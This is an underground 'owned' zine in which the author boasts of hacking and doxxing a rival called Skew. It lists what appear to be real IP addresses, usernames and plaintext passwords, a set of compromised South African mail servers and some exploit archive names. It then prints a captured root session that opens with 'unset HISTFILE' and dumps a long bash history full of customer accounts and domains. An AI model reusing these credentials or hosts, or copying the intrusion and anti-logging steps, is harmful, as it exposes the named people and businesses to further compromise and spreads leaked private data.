#!/usr/bin/skew_gets_owned #dk/archives/submission #by murz Skew or as some know him as Tal0n has been pissing off the wrong people he lies to his freinds, hacks from his freinds boxes, codes shitty code, talks way to much shit about people he shouldnt.. is there anymore reason not to own this kid. side not if you have a shell on one of his boxes rm youreself skew has been trojaned more than my highschool prom date. ------------------------------------------------------------------------------------------------------ Checklist: [1] Find Proof Skew == Tal0n [2] Get into his bhugc/darkminds group and steal warez. [3] log his passwds [4] log his shells [5] get his docs [6] make him hand over all his code to me. [7] make his state a public appology on his site, #darpa, #phrack, #darknet ------------------------------------------------------------------------------------------------------ so lets get this shit started. [1] PR00F (01:50:11) omgseckz : tell me the truth.. are you really tal0n ? (01:50:32) Skew --> http://skew.blackhat.ru: yep.. but dont ever address me as my alter ego again plz [2] GET INTO BHUGC // DARKMINDS AND STEAL WAREZ. May 31 18:10:32 May 31 18:10:36 BlackHat UnderGround Community is a community of codes in the blackhat community that contribute code on a server that is shared with the other blackhats who have access to it. The community stays updated and more alive when people upload more and more private exploits, tools, shellcodes, and other non-public works of the community member. May 31 18:10:39 Currently, we are just starting up and may have a server in a week or so. If you are interested in joining the community, the requirement is when the server is up and we are organized to upload ONE exploit written by yourself and we encourage the uploads to atleast once a month although not required. May 31 18:10:43 May 31 18:11:56 akula talked to me about it today May 31 18:12:05 i guess we better start on it May 31 18:28:09 skew invite ppl you think would be interested in this in here May 31 18:28:11 skew and paste them that if you like to give them a intro to BHUGC May 31 18:28:15 skew and paste them that if you like to give them a intro to BHUGC May 31 18:28:17 bb Ok, looks like we're in he is their warez list: ==================================== 14,888 priv8LEEEET.pl 25,354 openssl-too-open.tar.gz 5,969 m00-SPAm.zip 839,680 m00-deadbear3.tar.gz 12,300 557vnc.extra.c 37,787 dfnctsc-kaiten.c 7,868 imap4life.pl <-- only thing here coded by skew.. and he had alot of help with that even. 54,092 m00-apache-priv8.tar.gz 8,516 priv8sambar.pl 806,450 m00-deadbear2.tar.gz 805,930 m00-deadbear.tar.gz =================================== [3] LOG HIS PASSWORDS. 2to: 24.177.23.252 user: skew pass: 5ubiZ3r0 #skew skewtty.dyndns.org pass_from: 212.202.49.153 user: skew pass: *jd4^52h*d2= #skew localhost ### skew rooted boxes ### plet.compumail.co.za knysna.compumail.co.za umhlanga.compumail.co.za lin02.compumail.co.za histologic.no-ip.info irenefw.irenecountrylodge.co.za 196.25.22.178 [4] LOG HIS SHELLS: ------------------------------------ skew @ plet: Here we learn Skew has mad eleet codes and can sshbrute like a bitch. ------------------------------------ login as: root root@196.15.249.204's password: [root@plet root]# unset HISTFILE [root@plet root]# history 1 dig mail.nfmc.org 2 mailconf 3 dig mail.nfmc.org.za 4 dig nfmc.org.za 5 dig nfmc.org.za mx 6 mailconf 7 exit 8 cd /home/ 9 adduser aawind_heather 10 passwd aawind_heather 11 mailconf 12 exit 13 passwd vepac_patcarson 14 exit 15 netconf 16 drakconnect 17 exit 18 cd /home/ 19 passwd aawind_heather 20 exit 21 cd /home/ 22 exit 23 ssh lin02.compumail.co.za 24 exit 25 cd /home/ 26 exit 27 mailconf 28 exit 29 mailconf 30 cd /home/ 31 cd motocomp 32 ll 33 userconf 34 ll 35 mailconf 36 ll /var/spool/mail/mclauren 37 passwd mclauren/ 38 passwd mclauren 39 ll /var/spool/mail/mclauren 40 exit 41 ll /var/spool/mail/mclauren 42 exit 43 ll /var/spool/mail/mclauren 44 exit 45 cd /var/spool/mail/ 46 exit 47 mailconf 48 exit 49 dig merchantsponsors.co.za 50 dig merchantsponsors.co.za mx 51 dig www.merchantsponsors.co.za 52 /etc/init.d/named restart 53 dig www.merchantsponsors.co.za 54 /etc/init.d/named restart 55 dig www.merchantsponsors.co.za 56 mailconf 57 ssh lin02 58 mailconf 59 exit 60 mailconf 61 cd /home/ 62 adduser lw_danielle 63 mailconf 64 passwd lw_danielle 65 exit 66 vi /etc/ntp/step-tickers 67 vi /etc/ntp.conf 68 /etc/init.d/ntpd restart 69 grep ntpd /var/log/messages 70 exit 71 dig webmail.alberton.gp.school.za 72 ping induna.saix.net 73 ssh 196.15.249.203 74 mailconf 75 ping exchange.alberton.gp.scholl.za 76 ping exchange.alberton.gp.school.za 77 exit 78 mailconf 79 ifconfig 80 exit 81 mailq 82 exit 83 mailconf 84 mailq 85 mailconf 86 exit 87 cd /etc/vmail/ 88 ll 89 exit 90 cd home 91 cd /home 92 ls 93 passwd 94 passwd lw_danielle 95 passwd lw_danielle\ 96 passwd lw_danielle 97 mailconf 98 ls 99 passwd lw_danielle 100 exit 101 mailconf 102 ssh lin02 103 exit 104 mailconf 105 ssh lin2 106 ssh lin02 107 mailconf 108 clear 109 cd /home/ 110 ls 111 cd frog 112 ll 113 cd .. 114 mailconf 115 exit 116 dig neslife.co.za mx 117 dig neslife.co.za mx @196.15.249.201 118 dig neslife.co.za mx @196.15.249.203 119 dig nestlife.co.za mx @196.15.249.203 120 mailconf 121 cd /h0ome 122 cd /home 123 ls 124 ping www.google.com 125 exit 126 mailconf 127 passwd atn_natasha 128 passwd atn_marianne 129 exit 130 mailconf 131 adduser subaru_maria 132 passwd subaru_maria 133 exit 134 cd /var/log/mail 135 vi info 136 exit 137 passwd subaru_maria 138 mailconf 139 exit 140 mailconf 141 cd /var/spool/mail 142 ll aawind_zack 143 exit 144 ssh 196.15.249.201 145 exit 146 cd\ 147 cd / 148 cls 149 clear 150 mqueue 151 mailq 152 cat /var/log/mail/info | grep bsn-i.com 153 mailconf 154 ssh lin02 155 exit 156 cat /var/log/mail/info | grep vusi.sithole@nestlife.co.za 157 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za 158 clar 159 clear 160 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za 161 ssh lin02 162 exit 163 mailconf 164 exit 165 ssh lin02.lanlink.co.za 166 exit 167 mailconf 168 cd /home/ 169 ls 170 adduser cm_info 171 passwd cm_info 172 userdel cm_info 173 mail 174 ll 175 adduser catchcadmapping 176 passwd catchcadmapping 177 mailconf 178 exit 179 cd /var/named/ 180 ll 181 cd /etc/ 182 vi named.conf 183 exit 184 mailconf 185 exit 186 rndc reload 187 rndc reload cadmapping.co.za 188 vi /var/named/sec/cadmapping.co.za 189 exit 190 vi /etc/named.conf 191 rndc reload 192 vi /etc/named.conf 193 rndc reload 194 vi /etc/named.conf 195 rm /var/named/sec/mabula.co.za 196 rm /var/named/sec/lodge.mabula.co.za 197 rm /var/named/sec/holton.co.za 198 rm /var/named/sec/ehd.co.za 199 rndc reload 200 vi /etc/named.conf 201 rndc reloa 202 rndc reload 203 rndc reload taalgenoot.co.za 204 rndc taalgenoot.co.za reloa 205 rndc reload 206 rndc reload taalgenoot.co.za 207 vi /etc/named.conf 208 rndc reload taalgenoot.co.za 209 rndc reload 210 rndc reload taalgenoot.co.za 211 tail /var/log/messages 212 vi /etc/named.conf 213 rndc reload taalgenoot.co.za 214 rndc reload 215 rndc reload taalgenoot.co.za 216 exit 217 wshaper status 218 whereis wshaper 219 vi /usr/sbin/wshaper 220 wshaper 221 whereis wshaper 222 wshaper status 223 vi /usr/sbin/wshaper 224 wshaper stop 225 wshaper 226 wshaper status 227 cd /etc/init.d/ 228 ll 229 cp named wshaper 230 vi wshaper 231 rm wshaper 232 bwm 233 wshaper status 234 exit 235 mailconf 236 reboot 237 exit 238 cd /var/spool/mail/ 239 mailconf 240 exit 241 passwd msp_info 242 exit 243 ssh lin02.lanlink.co.za 244 exit 245 ssh lin02.lanlink.co.za 246 exit 247 vi /etc/vmail/aliases.frogav.co.za 248 exit 249 cat /var/log/mail/info | grep arcadia.no-ip.info 250 locate fetchmail 251 exit 252 vi /etc/named.conf 253 exit 254 ssh lin02.lanlink.co.za 255 exit 256 wshaper status 257 wshaper 258 netstat -an | grep :25 259 df -h 260 exit 261 /etc/init.d/sendmail restart 262 /etc/init.d/sendmail stop 263 /etc/init.d/sendmail start 264 ssh uvongo 265 exit 266 mailconf 267 dig www.khuphukani.co.za 268 dig www.khuphukani.co.za @196.15.249.203 269 userconf 270 mailconf 271 cd /home 272 ls 273 mailconf 274 adduser kh_info 275 adduser kh_sales 276 adduser kh_susanb 277 adduser kh_alessia 278 adduser kh_technical 279 passwd kh_info 280 passwd kh_sales 281 passwd kh_susanb 282 passwd kh_alessia 283 passwd kh_technical 284 mailconf 285 cd /var/spool/mail/ 286 ls 287 ls kh_ -s 288 ls -s 289 exit 290 df -h 291 /etc/init.d/sendmail stop 292 pf -ef | grep sendmail 293 ps 294 psps -ef | grep sendmail 295 ps -ef | grep sendmail 296 /etc/init.d/sendmail start 297 tail -f /var/log/mail/info 298 mailconf 299 vi /var/lib/mailertable 300 cd /etc/vmail/ 301 ll aliases.alltransportneeds.co.za 302 vi /var/lib/mailertable 303 vi aliases.alltransportneeds.co.za 304 mailconf 305 ll *atn* 306 ll 307 mailconf 308 cd /var/named/sec/ 309 ll 310 mailconf 311 dig atn.co.za mx 312 dig atn.co.za ns 313 dig alltransportneeds.co.za ns 314 wshaper status 315 exit 316 ifconfig 317 exit 318 telnet 127.0.0.1 110 319 telnet 127.0.0.1 25 320 exit 321 dig pop.khupukano.co.za 322 mailconf 323 passwd hk_info 324 passwd kh_info 325 passwd kh_technical 326 passwd kh_alissia 327 cd /home 328 passwd kh_alessia 329 passwd kh_sales 330 passwd kh_susanb 331 passwd kh_technical 332 dig pop.khuphukani.co.za 333 /etc/init.d/named resatrt 334 /etc/init.d/named restart 335 dig pop.khuphukani.co.za 336 exit 337 cd /home 338 ls 339 passwd kh_technical 340 exit 341 clear 342 mailconf 343 adduser patm_kzn 344 passwd patm_kzn 345 adduser patm_wc 346 passwd patm_wc 347 adduser patm_er 348 passwd patm_er 349 passwd patm_nr 350 adduser patm_nr 351 passwd patm_nr 352 mailconf 353 exit 354 dig ub.co.zamx 355 dig ub.co.za mx 356 mailconf 357 exit 358 cd / 359 cd /etc/vmail/ 360 cat aliases.delvenco.co.za 361 mailconf 362 cd /var/spool/mail/ 363 ll catchdelvenco 364 ll -h catchdelvenco 365 ll -m catchdelvenco 366 ll catchdelvenco 367 exit 368 mailconf 369 exit 370 adduser catchibe 371 mailconf 372 adduser ibe_sandyb 373 adduser ibe_roadmech 374 adduser ibe_ibe 375 adduser ibe_tarbaby 376 passwd ibe_sandyb 377 passwd ibe_roadmech 378 passwd ibe_tarbaby 379 passwd ibe_ibe 380 ssh knysna.compumail.co.za 381 exit 382 mailq 383 exit 384 tail -f /var/log/mail/info | grep hotmail.com 385 exity 386 exit 387 tail -f /var/log/mail/info | grep italpizza.co.za 388 passwd emp-judy 389 tail -f /var/log/mail/info | grep italpizza.co.za 390 ssh lin02 391 mailconf 392 exit 393 mailconf 394 l /var/spool/mail/ibe_ibe 395 ll /var/spool/mail/ibe_ibe 396 tail -f /var/log/mail/info | grep ibe.co.za 397 ll /var/spool/mail/ibe_ibe 398 tail -f /var/log/mail/info | grep ibe.co.za 399 exit 400 clear 401 mailconf 402 /etc/init.d/sendmail restart 403 exit 404 vi /etc/vmail/aliases.falstaff.co.za 405 mailconf 406 cd /etc/ 407 vi named.conf 408 dig mx delvenco.co.za 409 exit 410 cd /var/spool/mail/ 411 grep no-ip.info * 412 ll ber* 413 cd /etc/vmail/ 414 cat aliases.delvenco.co.za 415 cat aliases.alltransportneeds.co.za 416 mailconf 417 cat aliases.onestar.co.za 418 mailconf 419 cd / 420 exit 421 mailconf 422 cd /etc/vmail/ 423 mailconf 424 /etc/init.d/sendmail stop 425 /etc/init.d/sendmail start 426 vi /root/.fetchmailrc 427 passwd catchonestar 428 cd /var/lib/ 429 ll 430 vi mailertable 431 passwd catchdelvenco 432 ll /var/spool/mail/catchliber* 433 cd /var/spool/mail/ 434 ll *liber* 435 exit 436 cd /home/ 437 mailconf 438 clear 439 sendmail restart 440 /etc/init.d/sendmail restart 441 exit 442 mailconf 443 ssh lin02 444 exit 445 ssh 196.25.45.234 446 exit 447 autopasswd 448 autopasswd --help 449 autopasswd -S joe 450 whereis autopassword 451 whereis autopasswrd 452 whereis autopasswd 453 file /usr/bin/autopasswd 454 vi /usr/bin/autopasswd 455 cd /home/joe/ 456 ll 457 genpassHex -? 458 genpassHex password 459 man genpassHex 460 whereis genpassHex 461 more /usr/bin/genpassHex 462 exit 463 vi /etc/named.conf 464 33 465 ll 466 cd /var/named/sec/ 467 rll 468 ll 469 ll pak* 470 exit 471 ssh parktonian.n0-ip.info 472 ssh parktonian.no-ip.info 473 ssh parktonian.n0-ip.infoparktonian.n0-ip.info 474 ssh 165.165.80.124 475 ssh 165.165.80.1 476 ssh 165.165.85.80 477 ssh parktonian.no-ip.info 478 ping parktonian.no-ip.info 479 ssh parktonian.no-ip.info 480 ssh 165.165.85.80 481 ssh parktonian.no-ip.info 482 exity 483 exit 484 mailconf 485 adduser tisc_derek.house 486 passwd tisc_derek.house 487 userdel tisc_tisc_derek.house -r 488 userdel tisc_tisc.derek.house -r 489 userdel tisc_derek.house -r 490 useradd tisc_d.house -r 491 useradd tisc_d.house 492 mailconf 493 cd /home 494 ls 495 userdel tisc_d.house 496 useradd tisc_d.house 497 passwd tisc_d.house 498 cd /var/named/ 499 ls 500 malconf 501 mailconf 502 dig mail.tiscpty.com 503 ifconfig 504 passwd tisc_d.house 505 dig webmail.tiscpty.com 506 dig webmail.tiscpty.com mx 507 cd home 508 cd /home 509 ls 510 passwd tisc_d.house 511 /etc/init.d/sendmail restart 512 [root@plet home]# ls tisc 513 userdel tisc_d.house 514 useradd d.house 515 passwd house 516 passwd d.house 517 mailconf 518 dig mail.tiscpty.com 519 dig tiscpty.com mx 520 dig tiscpty.com mx @192.168.20.2 521 mailconf 522 dig tiscpty.com x 523 dig tiscpty.com mx 524 dig tiscpty.com mx @196.25.1.1 525 dig tiscpty.com mx @induna.saix.net 526 userdel d.house -r 527 ls 528 exit 529 mailconf 530 passwd emp-judy 531 exit 532 mailconf 533 exit 534 cd home 535 cd / 536 ls 537 cd home 538 ls 539 exit 540 mailconf 541 ifconfig 542 mailconf 543 /etc/sen 544 cd /etc/init.d/sendmail status 545 cd /etc/init.d/sendmail stop 546 /etc/init.d/sendmail status 547 /etc/init.d/sendmail status stop 548 /etc/init.d/sendmail stop 549 /etc/init.d/sendmail start 550 /etc/init.d/sendmail restart 551 cd /var/spool/mail/ 552 ls tisc_d.house 553 rm tisc_d.house 554 ls tisc_d.house 555 ls mailconf 556 mailconf 557 ls tisc_d.house 558 exit 559 mailconf 560 mailconf\ 561 mailconf 562 ifconfig 563 exit 564 tail -f errors | grep tiscpty.comtail -f errors | grep tiscpty.com 565 cd /var/log 566 cd mail 567 ls 568 tail -f info | grep tiscpty 569 570 tail -f info | grep tiscpty 571 exit 572 mailconf 573 /etc/init.d/sendmail restart 574 cd /var/log 575 ls 576 vi mail 577 cd mail 578 ls 579 vi errors 580 ls 581 vi info 582 ls 583 tail -f errors | grep tiscpty.com 584 mailconf 585 exit 586 cd /home/ 587 mailconf 588 adduser subaru_parts 589 passwd subaru_parts 590 exit 591 wshaper start 592 mailq 593 mailstat 594 deldefermail 595 mailq 596 whereis deldefermail 597 vi /usr/sbin/de;def 598 vi /usr/sbin/deldefermail 599 delqueue 600 mailq 601 whereis delqeue 602 whereis delqueue 603 vi /usr/sbin/delqueue 604 mailq 605 vi /usr/sbin/delqueue 606 sendmail -? 607 man sendmail 608 whereis sendmailspool 609 vi /usr/sbin/sendmailspool 610 exit 611 fsav -v 612 fsav --version 613 df -h 614 exit 615 dig kirk.co.za mx 616 mailconf 617 /etc/init.d/postfix restart 618 /etc/init.d/sendmail restart 619 exit 620 cd /etc/ma 621 cd /etc/mail 622 ll 623 vi relay_allow 624 vi virtusertable 625 vi name_allow 626 ll 627 cat access 628 /etc/init.d/xinetd restart 629 /etc/init.d/network restart 630 /etc/init.d/sendmail stop 631 /etc/init.d/sendmail start 632 wshaper status 633 tail -f /var/log/mail/info 634 chkconfig --list 635 cd /var/spool/ 636 cd mail/ 637 ll kirk_* 638 ll -h kirk_* 639 ll -m kirk_* 640 rm -rf kirk_fallback 641 mailconf 642 /etc/init.d/sendmail stop 643 /etc/init.d/sendmail start 644 pwd 645 ll -h 646 ll -? 647 ll 648 ll -H 649 ls -h 650 ls -H 651 ls -lah 652 man ll 653 ll kirk_* 654 df -h 655 ll 656 ll | more 657 rm ll_joe 658 ll | more 659 mailconf 660 /etc/init.d/sendmail stop 661 /etc/init.d/sendmail start 662 grep zacron passwd 663 grep zacron /etc/passwd 664 userdel -r catchzacron 665 userdel -r zacron_events 666 userdel -r zacron_zach 667 userdel -r zacron_zie 668 mail 669 df -h 670 ll 671 ll | more 672 rm -f BOGUS.alanna.* 673 ll | more 674 rm -f ssmark 675 exit 676 tcpdump -ni eth0 src 165.146.147.111 677 ping 165.146.147.111 678 tcpdump -ni eth0 src 165.146.147.111 679 tcpdump -ni eth0 src 165.146.100.119 680 netstat -an | grep 165.146.100.119 681 netstat -an | more 682 netstat -an 683 df -h 684 /etc/init.d/network restart 685 /etc/init.d/xinetd restart 686 locate netstat 687 tail -f /var/log/mail/info 688 tail -f /var/log/mail/info | grep 165.146.100.119 689 grep 165.146.100.119 /var/log/mail/info 690 tail -f /var/log/mail/info | grep 165.146.100.119 691 wshaper status 692 wshaper stop 693 tail -f /var/log/mail/info | grep 165.146.100.119 694 tail -f /var/log/mail/info 695 tail -f /var/log/mail/info | grep ipop3d 696 top 697 tail -f warnings | grep kirk 698 cd /var/log 699 tail -f warnings | grep kirk 700 cd /mail 701 cd mail 702 tail -f warnings | grep kirk 703 exit 704 cd /var/log 705 ls 706 tail -f messages | grep kirk 707 ifconfig 708 tail -f messages | grep kirk 709 mailconf 710 exit 711 cd /var/log 712 ls 713 cd mail 714 ls 715 tail -f errors | grep kirk 716 mailconf 717 exit 718 cd /var/log 719 ls 720 cd mail 721 ls 722 vi errors 723 vi info 724 mailconf 725 tail -f info | grep kirk 726 exit 727 ssh 196.15.249.201 728 exit 729 cd /var/named/ 730 ls 731 cd sec/ 732 ll 733 cp r-r-m.co.za ratana.co.za 734 vi r-r-m.co.za 735 vi ratana.co.za 736 exit 737 date 738 ssh 196.15.249.203 739 exit 740 ssh 196.15.249.203 741 date 742 exit 743 tail -f /var/log/mail/info | grep ub_saul@compumail.co.za 744 exit 745 cd /home 746 ls 747 mailconf 748 exit 749 cd /var/named/ 750 ls 751 cd sec/ 752 ls 753 cp ratana.co.za iphiko.co.za 754 vi iphiko.co.za 755 exit 756 /etc/init.d/named restart 757 vi /var/log/messages 758 clear 759 tail -f /var/log/messages 760 exit 761 cd /var/log/mail/ 762 grep deebar.co.za info 763 exit 764 wshaper statuis 765 wshaper status 766 wshaper stop 767 wshaper 768 wshaper status 769 exit 770 top 771 cd /proc/ 772 ll 773 ll filesystems 774 cat filesystems 775 ll fs 776 ll ide/ 777 ll 778 cat sys/fs/file-max 779 cat sys/fs/inode- 780 cat sys/fs/inode-nr 781 cat sys/fs/inode-state 782 cat sys/kernel/sysrq 783 cat sys/vm/bdflush 784 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush 785 ulimit 786 ulimit -? 787 ulimit -u 2048 788 mem 789 free 790 free -? 791 top 792 ps -ef 793 cd /etc/rc.d/ 794 vi rc.local 795 echo 8192 > /proc/sys/fs/file-max 796 echo 8192 > /proc/sys/fs/inode-max 797 echo 1 > /proc/sys/kernel/sysrq 798 echo 6 > /proc/sys/net/ipv4/tcp_syn_retries 799 echo 90 > /proc/sys/net/ipv4/tcp_fin_timeout 800 echo 0 > /proc/sys/net/ipv4/tcp_timestamps 801 ulimit -u 2048 802 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush 803 /usr/local/sbin/mii-diag -A 100baseTx-FD eth1 804 /usr/local/sbin/mii-diag -A 100baseTx-FD eth0 805 /usr/local/sbin/mii-diag -F 100baseTx-FD eth1 806 vi rc.local 807 exit 808 mailconf 809 ll /var/spool/mail/atn_mark 810 ll /var/spool/mail/atn_barney 811 tail -f /var/log/mail/info | grep @alltransportneeds.co.za 812 ll /var/spool/mail/atn_barney 813 ll /var/spool/mail/atn_mark 814 tail -f /var/log/mail/info | grep @alltransportneeds.co.za 815 cat /var/log/mail/info | grep @alltransportneeds.co.za 816 vi mailconf 817 mailconf 818 tail -f /var/log/mail/info | grep @atn.co.za 819 cat /var/log/mail/info | grep @alltransportneeds.co.za 820 exit 821 ifconfig 822 mailconf 823 adduser ratan_gavin 824 userdel ratan_gavin /r 825 userdel ratan_gavin -rt 826 userdel ratan_gavin -r 827 adduser ratana_gavin 828 passwd ratana_gavin 829 exit 830 mailconf 831 adduser ratana_bianca 832 adduser ratana_brian 833 adduser ratana_aub 834 adduser ratana_ntabiseng 835 passwd ratana_bianca 836 passwd ratana_brian 837 passwd ratana_aubrey 838 passwd ratana_ntabiseng 839 cat /var/log/messages 840 ssh knysna.compumail.co.za 841 exit 842 mailq 843 /etc/init.d/sendmail stop 844 man sendmail 845 cd /var/spool/mqueue/ 846 ll 847 rm -f * 848 /etc/init.d/sendmail start 849 ll 850 mailq 851 exit 852 ssh 196.34.39.26 853 mailq 854 exit 855 reboot 856 exit 857 ping sodwana 858 exit 859 cd /etc/vmail/ 860 ll aliases.alltransportneeds.co.za 861 exit 862 ssh hitek.no-ip.info 863 mail 864 ping hitek.no-ip.info 865 drakconf 866 cat /var/lib/mailertable 867 cat /var/lib/mailertable | grep logisticor 868 exit 869 locate wshap 870 vi /usr/sbin/wshaper 871 exit 872 mailconf 873 ssh 196.15.249.201 874 ssh 196.25.45.246 875 ssh andre@196.25.45.246 876 exit 877 ssh umglanga.compumail.co.za 878 exit 879 ssh lin02 880 ssh 196.25.45.254 881 exit 882 dig mail.tiscali.co.za 883 exit 884 df -h 885 ll 886 cd / 887 locate iso 888 locate iso | more 889 890 ssh 196.15.249.207 891 exit 892 mailconf 893 exit 894 ssh lin02.lanlink.co.za 895 exit 896 mail mark@mentorfreight.co.za 897 exit 898 mailconf 899 cd /var/spool/mail/ 900 ll mentor 901 cat mentor 902 mailconf 903 cat catchmf 904 ll catchmft 905 ll catchmtf 906 passwd catchmtf 907 exit 908 tail -f /var/log/mail/info | grep hi-tek.co.za 909 exit 910 mailconf 911 tail -f /var/log/mail/info | grep catchhitek 912 exit 913 vi /var/lib/mailertable 914 exit 915 mailconf 916 cd /home/ 917 adduser catchhitek 918 passwd catchhitek 919 mailconf 920 ll /var/spool/mail/catchhitek 921 mailconf 922 ll /var/spool/mail/catchhitek 923 tail -f /var/log/mail/info | grep logisticor.com 924 ssh mail.logisticor.com 925 telnet mail.logisticor.com 25 926 ssh mail.logisticor.com 927 ssh joe@mail.logisticor.com 928 telnet mail.logisticor.com 25 929 exit 930 clear 931 tail -f /var/log/mail/info | grep hi-tek.co.za 932 tail -f /var/log/mail/info | grep wynand 933 ssh lin02.compumail.co.za 934 ping lin02.compumail.co.za 935 ssh lin02.compumail.co.za 936 ping lin02.compumail.co.za 937 ssh lin02.compumail.co.za 938 mailconf 939 ssh lin02.compumail.co.za 940 telnet mail.logisticor.com 25 941 ssh lin02.compumail.co.za 942 exit 943 cat /var/log/mail/info | grep histologic.co.za 944 mailconf 945 cat /var/log/mail/info | grep catchhisto 946 tail -f /var/log/mail/info | grep catchhisto 947 tail -f /var/log/messages 948 tail -f /var/log/mail/info | grep catchhisto 949 exit 950 tail -f /var/log/mail/info | grep histologic.co.za 951 ll /var/spool/mail/catchhisto 952 exit 953 ll /var/spool/mail/catchhisto 954 exit 955 mailconf 956 ssh lin02.lanlink.co.za 957 exit 958 mailconf 959 tail -f /var/log/mail/info | grep histologic.co.za 960 ll /var/spool/mail/catchhisto 961 tail -f /var/log/mail/info 962 tail -f /var/log/mail/info | grep catchhisto 963 exit 964 ssh histologic.no-ip.info 965 exit 966 cat /etc/vmail/aliases.subaru-pretoria.co.za 967 adduser subaru_marelie 968 vi /etc/shadow 969 vi /etc/vmail/aliases.subaru-pretoria.co.za 970 vi /etc/shadow 971 exit 972 ssh knysna.compumail.co.za 973 tail -f /var/log/mail/info | grep 165.146.101.31 974 mailconf 975 dig frogav.co.za mx 976 dig frogav.co.za mx @196.43.1.14 977 mailconf 978 exit 979 mailconf 980 ssh lin02.compumail.co.za 981 adduser htgina 982 passwd htgina 983 mailconf 984 exit 985 w 986 login root 987 logout 988 exit 989 w 990 logout 991 unset HISTFILE 992 history [root@plet root]# ls -la total 297498 drwx------ 34 root root 3688 Jun 9 11:45 ./ drwxr-xr-x 21 root adm 880 May 30 08:20 ../ lrwxrwxrwx 1 root root 41 Feb 27 2003 .DCOPserver_plet.compumail.co.za_:0 -> /root/.DCOPserver_plet.compumail.co.za__0 -rw-r--r-- 1 root root 67 Mar 13 2003 .DCOPserver_plet.compumail.co.za__0 -rw------- 1 root root 434 Jun 12 2004 .ICEauthority -rw------- 1 root root 312 May 8 16:06 .Xauthority -rw-r--r-- 1 root root 1479 Feb 16 2002 .Xdefaults -rw------- 1 root root 15889 Jun 14 01:21 .bash_history -rw-r--r-- 1 root root 24 Feb 16 2002 .bash_logout -rw-r--r-- 1 root root 106 Feb 16 2002 .bash_profile -rw-r--r-- 1 root root 226 Feb 16 2002 .bashrc drwx------ 2 root root 72 Oct 20 2003 .cedit/ drwxr-xr-x 3 root root 96 Sep 3 2003 .cpan/ -rw-r--r-- 1 root root 233 Feb 16 2002 .cshrc -rw-r--r-- 1 root root 14 Feb 9 2003 .desktop -rw------- 1 root root 222 Feb 9 2003 .draksync -rwx--x--- 1 root root 538 Mar 30 2004 .fetchmailrc* drwx------ 4 root root 128 Mar 13 2003 .gconf/ drwx------ 2 root root 80 Mar 13 2003 .gconfd/ drwxr-xr-x 2 root root 72 Feb 9 2003 .gnome/ drwx------ 3 root root 96 Mar 13 2003 .gnome2/ drwx------ 2 root root 48 Mar 13 2003 .gnome2_private/ drw------- 2 root root 200 Nov 2 2003 .gnupg/ -rw-r--r-- 1 root root 149 Feb 9 2003 .gtkrc -rw-r--r-- 1 root root 124 Feb 9 2003 .gtkrc-2.0 -rw-r--r-- 1 root root 1111 Feb 9 2003 .gtkrc-kde drwxr-xr-x 2 root root 112 Feb 9 2003 .icewm/ -rw-r--r-- 1 root root 160 Feb 9 2003 .info_perso drwx------ 2 root root 48 Jun 11 2004 .inspect_tmp_dir/ drwxr-xr-x 4 root root 192 Feb 8 2003 .kde/ drwxr-xr-x 3 root root 144 Jun 15 2004 .mc/ drwxr-xr-x 2 root root 80 Feb 8 2003 .mcop/ -rw------- 1 root root 31 Feb 9 2003 .mcoprc drwxr-xr-x 5 root root 144 Mar 13 2003 .mozilla/ drwxr-xr-x 2 root root 176 Feb 8 2003 .qt/ -rw-r--r-- 1 root root 135 Aug 31 2004 .rpmdrake drwx------ 2 root root 80 Sep 15 2003 .spamassassin/ drwx------ 2 root root 136 Nov 14 2004 .ssh/ -rw-r--r-- 1 root root 189 Feb 16 2002 .tcshrc -rw------- 1 root root 6112 Jun 9 11:45 .viminfo -rw------- 1 root root 0 Mar 24 2004 .viminfo.tmp -rw------- 1 root root 4096 Nov 26 2004 .viminfy.tmp -rw------- 1 root root 0 Mar 24 2004 .viminfz.tmp -rw-r--r-- 1 root root 3750 Feb 16 2002 .vimrc -rw-r--r-- 1 root root 6 Feb 9 2003 .wmrc -rw-r--r-- 1 root root 13396 Feb 8 2003 .xftcache -rw------- 1 root root 9860 Aug 20 2003 .xsession-errors -rwxr-xr-x 1 root root 3741018 Jun 14 2004 BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run* -rw-r--r-- 1 root root 2394 Sep 3 2004 Creport drwx------ 3 root root 152 Feb 9 2003 Desktop/ drwxr-xr-x 2 root root 48 Feb 9 2003 Documents/ drwx------ 7 root root 520 Jun 12 2004 Mail/ -rw-r--r-- 1 root root 2184 Sep 3 2004 Sreport -rw-r--r-- 1 root root 628757 Mar 12 2004 XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz -rw-r--r-- 1 root root 1082040 Jun 15 2004 XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz -rw-r--r-- 1 root root 848085 Jun 18 2004 XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz -rw-r--r-- 1 root root 1088878 Sep 3 2004 XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz -rw-r--r-- 1 root root 1090708 Sep 10 2004 XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz -rwxr-x--x 1 root root 513 Jan 4 16:14 aliases.frogav.co.za* drwxr-xr-x 2 root root 1080 Nov 24 2004 altermime-0.3.6/ -rw-r--r-- 1 root root 69604 Nov 24 2004 altermime-0.3.6.tar.gz drwxr-xr-x 8 joe joe 1096 Aug 31 2004 apg-2.2.3/ -rw-r--r-- 1 root root 49779 Aug 31 2004 apg-2.2.3-1mdk.i586.rpm -rw-r--r-- 1 root root 108186 Aug 31 2004 apg-2.2.3.tar.gz -rwxr-xr-x 1 root root 170 May 29 2003 cleanxmime* -rw------- 1 root root 61440 May 9 12:47 core.13099 -rw------- 1 root root 61440 May 9 12:47 core.13184 -rw------- 1 root root 61440 May 9 12:47 core.13191 -rw------- 1 root root 61440 Apr 8 08:16 core.18972 -rw-r--r-- 1 root root 497631 Oct 2 2003 csav-4.80.7-shared.i386.rpm -rw------- 1 root root 2270855 May 30 15:04 dead.letter -rw-r--r-- 1 root root 23200 Jan 21 2004 doc_linux.zip -rw-r--r-- 1 root root 1473 Mar 12 2004 domainlist drwx------ 2 root root 272 Feb 8 2003 drakx/ -rw-r--r-- 1 root root 164485 Jun 1 2004 fernando -rw-r--r-- 1 root root 416 Oct 21 2003 fetchmail.txt -rw-r--r-- 1 root root 5372411 Jun 15 2004 fsav-wks-4-52-2481.tgz 